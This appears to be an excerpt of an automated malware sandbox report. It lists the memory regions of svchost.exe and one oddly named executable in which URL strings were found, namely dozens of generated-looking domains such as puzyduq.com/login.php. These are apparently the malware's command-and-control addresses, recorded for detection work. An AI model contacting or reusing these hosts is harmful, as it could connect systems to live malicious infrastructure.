Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272828863.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513891995.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272537462.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264150395.00000000086FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272290978.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2283080934.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2508227965.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2273007343.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvyjop.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194320231.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202674715.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393409003.000000000338E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3347345159.000000000338D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvylyg.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvymaq.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323585198.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvypul.com/login.php
Source: svchost.exe, 00000002.00000003.2772293102.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772917622.00000000033AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvywal.com/X
Source: svchost.exe, 00000002.00000003.2772293102.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772917622.00000000033AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvywal.com/http://pujygug.com/P
Source: svchost.exe, 00000002.00000003.2772293102.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2783207555.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772917622.00000000033AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvywal.com/http://qetyxiv.com/http://qetyxiv.com/yrLMEM
Source: svchost.exe, 00000002.00000003.2334859023.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337298832.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337435190.0000000008611000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335316915.0000000008611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvywup.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337099007.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329748670.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328870829.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvyxeq.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671356551.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzybil.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359453590.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzyceg.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296551987.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzydal.com/login.php
Source: svchost.exe, 00000002.00000003.2709443016.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670655678.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2673206249.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671925473.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzyduq.com/http://gadyzib.com/http://qeqyqep.com/http://lymymax.com/http://lymymax.com/
Source: svchost.exe, 00000002.00000003.2709443016.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670655678.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2673206249.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671925473.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzyduq.com/http://vofyzof.com/http://puzyduq.com/http://qeqyqep.com/http://gadyzib.com/http:
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzyduq.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzyjyg.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328870829.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2581725706.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzylol.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3383219866.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3302424542.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267140420.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396823285.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397700563.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434703123.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524832364.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393071613.0000000003385000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009356000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.0000000000658000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2746386835.0000000008E3C000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2746386835.0000000008E37000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2746386835.0000000008E05000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzylyp.com/login.php
Source: svchost.exe, 00000002.00000003.2434703123.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3401901735.0000000008633000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202332641.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzymig.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzypav.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzypug.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577742596.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323585198.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577938444.0000000008693000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzytap.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2581725706.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzywuq.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323585198.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321538396.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzyxyv.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebyhag.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296776136.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296803931.00000000086F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebyhuq.com/login.php
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2198550241.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402591277.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2198486951.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393482937.000000000339B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344396822.0000000003399000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebylug.com/login.php
